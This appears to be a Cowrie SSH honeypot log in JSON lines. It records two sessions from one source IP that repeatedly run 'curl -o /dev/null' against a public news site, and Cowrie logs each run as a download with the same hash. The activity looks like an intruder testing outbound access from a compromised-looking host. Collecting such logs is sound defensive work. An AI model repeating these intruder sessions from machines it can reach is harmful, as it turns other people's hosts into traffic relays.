{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.794767Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.796560Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.797280Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.815538Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.816360Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.819609Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.824565Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.835831Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.837836Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.838781Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.844061Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.854505Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.855609Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.873438Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.877308Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.878413Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.879769Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.886291Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.889701Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.896647Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.899143Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.903526Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.904207Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.910043Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.918301Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.924135Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.925014Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.942505Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.943633Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.946752Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.963770Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.964718Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:35.984375Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:35.985347Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.001965Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.003160Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.024536Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.025681Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.043643Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.044721Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.068461Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.069555Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.082318Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.083165Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.110025Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.110973Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.120489Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.121336Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.153559Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.154466Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.158973Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.159827Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.193899Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.194811Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.197902Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.198545Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.233188Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.234163Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.236991Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.238267Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.271930Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.272787Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.275807Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.276494Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.313447Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.314335Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.316478Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.317369Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.339460Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.355937Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.356846Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.359035Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.359989Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.384394Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.395343Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.396222Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.401039Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.402048Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.402999Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.416886Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.425002Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.434672Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.435527Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.437921Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.438911Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.441430Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.472894Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.473891Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.477604Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.478614Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.484045Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.500126Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.513995Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:36.514987Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:36.517866Z","src_ip":"212.227.125.160","session":"7541ed730449"}
